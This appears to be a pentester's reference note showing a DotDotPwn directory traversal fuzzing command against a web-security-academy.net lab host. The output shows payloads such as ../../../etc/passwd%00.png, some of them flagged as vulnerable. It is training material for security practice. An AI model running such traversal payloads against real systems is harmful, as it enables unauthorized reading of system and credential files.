dotdotpwn
Reference
Code:
perl ./dotdotpwn.pl -m http-url -h https://0ab800e204755c80c049142e009d00d3.web-security-academy.net/ -u https://0ab800e204755c80c049142e009d00d3.web-security-academy.net/image?filename=TRAVERSAL -k "root" -e "%00.png"
Example:
โโโ(eoใฟoffsec)-[~/Tools/dotdotpwn]
โโ$ perl ./dotdotpwn.pl -m http-url -h https://0ab800e204755c80c049142e009d00d3.web-security-academy.net/ -u https://0ab800e204755c80c049142e009d00d3.web-security-academy.net/image?filename=TRAVERSAL -k "root" -e "%00.png"
#################################################################################
# #
# CubilFelino Chatsubo #
# Security Research Lab and [(in)Security Dark] Labs #
# chr1x.sectester.net chatsubo-labs.blogspot.com #
# #
# pr0udly present: #
# #
# ________ __ ________ __ __________ #
# \______ \ ____ _/ |_\______ \ ____ _/ |_\______ \__ _ __ ____ #
# | | \ / _ \\ __\| | \ / _ \\ __\| ___/\ \/ \/ // \ #
# | ` \( <_> )| | | ` \( <_> )| | | | \ /| | \ #
# /_______ / \____/ |__| /_______ / \____/ |__| |____| \/\_/ |___| / #
# \/ \/ \/ #
# - DotDotPwn v3.0.2 - #
# The Directory Traversal Fuzzer #
# http://dotdotpwn.sectester.net #
# dotdotpwn@sectester.net #
# #
# by chr1x & nitr0us #
#################################################################################
[+] Report name: Reports/0ab800e204755c80c049142e009d00d3.web-security-academy.net_11-21-2022_23-19.txt
[========== TARGET INFORMATION ==========]
[+] Hostname: 0ab800e204755c80c049142e009d00d3.web-security-academy.net
[+] Protocol: https
[+] Port: 443
[=========== TRAVERSAL ENGINE ===========]
[+] Creating Traversal patterns (mix of dots and slashes)
[+] Multiplying 6 times the traversal patterns (-d switch)
[+] Creating the Special Traversal patterns
[+] Translating (back)slashes in the filenames
[+] Adapting the filenames according to the OS type detected (unix)
[+] Including Special sufixes
[+] Appending the file extension %00.png to each fuzz string
[+] Traversal Engine DONE ! - Total traversal tests created: 11052
[=========== TESTING RESULTS ============]
[+] Ready to launch 3.33 traversals per second
[+] Press Enter to start the testing (You can stop it pressing Ctrl + C)
[+] Replacing "TRAVERSAL" with the traversals created and sending
[*] Testing URL: https://0ab800e204755c80c049142e009d00d3.web-security-academy.net/image?filename=../etc/passwd%00.png
[*] Testing URL: https://0ab800e204755c80c049142e009d00d3.web-security-academy.net/image?filename=../etc/issue%00.png
[*] Testing URL: https://0ab800e204755c80c049142e009d00d3.web-security-academy.net/image?filename=../../etc/passwd%00.png
[*] Testing URL: https://0ab800e204755c80c049142e009d00d3.web-security-academy.net/image?filename=../../etc/issue%00.png
[*] Testing URL: https://0ab800e204755c80c049142e009d00d3.web-security-academy.net/image?filename=../../../etc/passwd%00.png <- VULNERABLE
[*] Testing URL: https://0ab800e204755c80c049142e009d00d3.web-security-academy.net/image?filename=../../../etc/passwd%00.png <- VULNERABLE
Last updated